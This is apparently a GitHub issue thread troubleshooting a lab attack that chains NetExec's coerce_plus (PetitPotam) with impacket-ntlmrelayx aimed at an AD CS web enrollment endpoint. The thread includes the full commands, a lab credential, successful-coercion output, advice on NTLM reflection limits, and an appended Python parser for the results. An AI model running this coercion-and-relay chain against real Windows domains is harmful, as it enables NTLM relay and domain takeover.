
coerce_plus help

Open sec13b opened this issue 8 months ago • 3 comments

Can someone explain how this works? I don't understand, no offense.

Kali ip 10.0.2.1
Windows server 10.0.0.2

Example:

First command:

netexec  smb 10.0.0.2 -u 'marlboro' -p 'marlboro123' -M coerce_plus -o ALWAYS=True LISTENER=10.0.2.1

SMB         10.0.0.2       445    TABACSERVER        [*] Windows Server 2022 Build 20348 x64 (name:TABACSERVER) (domain:TABACSERVER) (signing:False) (SMBv1:False)
SMB         10.0.0.2       445    TABACSERVER        [+] TABACSERVER\marlboro:marlboro123
COERCE_PLUS 10.0.0.2       445    TABACSERVER        VULNERABLE, PetitPotam
COERCE_PLUS 10.0.0.2       445    TABACSERVER        Exploit Success, lsarpc\EfsRpcAddUsersToFile
COERCE_PLUS 10.0.0.2       445    TABACSERVER        Exploit Success, lsarpc\EfsRpcAddUsersToFileEx
COERCE_PLUS 10.0.0.2       445    TABACSERVER        Exploit Success, lsarpc\EfsRpcDecryptFileSrv
COERCE_PLUS 10.0.0.2       445    TABACSERVER        Exploit Success, lsarpc\EfsRpcDuplicateEncryptionInfoFile


Second command:

impacket-ntlmrelayx -t http://10.0.0.2/certsrv/certfnsh.asp  -smb2support  
OR:
impacket-ntlmrelayx -t http://TABACSERVER/certsrv/certfnsh.asp  -smb2support 

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled
[*] Servers started, waiting for connections

Nothing

Thank you

sec13b, Apr 25 '25 17:04

The commands are looking good. Maybe there is some firewall in between that stops the traffic? What does wireshark say?

NeffIsBack, Apr 26 '25 23:04

Same story here. New to relaying and wondering why I don't receive any auth. Ping from one machine to the other is OK.

My machine, for example, 192.168.1.11; target machine 192.168.0.12.

Command: nxc smb dcip -u username -p password -M coerce_plus -o LISTENER=192.168.1.11

ntlmrelayx the same. No signing on the target SMB PC.

SantaLaMuerte, Apr 27 '25 03:04

In my lab it works flawlessly: [image]

Maybe your network setup is broken somehow.

NeffIsBack, Apr 27 '25 15:04

Try to have 2 local networks: 192.168.0.0/24 and 10.0.0.0/24.

sec13b, Apr 27 '25 19:04

I do that regularly. Just today I coerced multiple servers with it. Maybe your firewall/router is the problem.

NeffIsBack, Apr 28 '25 15:04

It is from the modem router firewall.

sec13b, Apr 28 '25 16:04

The NTLM hash is coming from 10.0.0.2, and you are trying to relay it back to the same 10.0.0.2. When using Responder, you can clearly see that the hash is being captured from that machine.

However, you cannot relay a machine’s own hash back to itself — this is blocked by Windows’ loopback protections and NTLM reflection mitigations. https://webconnection.west-wind.com/docs/User-Guide/Knowledge-Base-Topics/Windows-Authentication-Errors-on-local-Servers-Loopback-Protection.html

So in short: even though the hash is successfully captured from 10.0.0.2, relaying it back to 10.0.0.2 will not work.

lodos2005, May 03 '25 09:05
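Added example, not code from this thread or from the NetExec or Impacket projects: a small Python parser for the COERCE_PLUS output pasted in the first post, plus the check lodos2005 describes, flagging when the ntlmrelayx -t target is the coerced host itself. The function names are mine and the sample lines are constructed from the output quoted above.

```python
import re
from urllib.parse import urlparse
# Constructed sample: netexec lines as quoted in the issue above.
SAMPLE_OUTPUT = r"""
SMB         10.0.0.2       445    TABACSERVER        [*] Windows Server 2022 Build 20348 x64 (name:TABACSERVER) (domain:TABACSERVER) (signing:False) (SMBv1:False)
COERCE_PLUS 10.0.0.2       445    TABACSERVER        VULNERABLE, PetitPotam
COERCE_PLUS 10.0.0.2       445    TABACSERVER        Exploit Success, lsarpc\EfsRpcAddUsersToFile
COERCE_PLUS 10.0.0.2       445    TABACSERVER        Exploit Success, lsarpc\EfsRpcAddUsersToFileEx
"""
# netexec line layout: <PROTO> <ip> <port> <hostname> <message>
LINE_RE = re.compile(r"^(?P<proto>\S+)\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+(?P<msg>.*)$")

def parse_netexec(output):
    # Per target IP: hostname, SMB signing flag, coercion methods found, RPC calls that succeeded.
    hosts = {}
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        h = hosts.setdefault(m["ip"], {"name": m["host"], "signing": None,
                                       "vulnerable": [], "coerced_via": []})
        msg = m["msg"]
        if m["proto"] == "SMB":
            s = re.search(r"\(signing:(True|False)\)", msg)
            if s:
                h["signing"] = s.group(1) == "True"
        elif m["proto"] == "COERCE_PLUS":
            if msg.startswith("VULNERABLE, "):
                h["vulnerable"].append(msg.split(", ", 1)[1])
            elif msg.startswith("Exploit Success, "):
                h["coerced_via"].append(msg.split(", ", 1)[1])
    return hosts

def relay_is_reflection(coerced_ip, relay_target, name_map):
    # True when the ntlmrelayx -t URL names the host whose auth was coerced (name_map: lower-case name -> IP).
    target = urlparse(relay_target).hostname  # urlparse lower-cases the hostname
    return name_map.get(target, target) == coerced_ip

def findings(output, relay_target):
    # Triage summary: coercible hosts, their signing state, and the reflection setup from the thread.
    hosts = parse_netexec(output)
    name_map = {info["name"].lower(): ip for ip, info in hosts.items()}
    out = []
    for ip, info in hosts.items():
        if info["coerced_via"]:
            out.append(f"{ip} ({info['name']}): coercible via {', '.join(info['vulnerable'])}, "
                       f"{len(info['coerced_via'])} EFSRPC calls; SMB signing {'required' if info['signing'] else 'NOT required'}")
        if relay_is_reflection(ip, relay_target, name_map):
            out.append(f"{ip}: relay target is the coerced host itself; Windows blocks NTLM reflection")
    return out
```

Running findings(SAMPLE_OUTPUT, "http://10.0.0.2/certsrv/certfnsh.asp") reproduces the situation in the first post: the host is coercible with signing not required, and the relay target equals the coerced host.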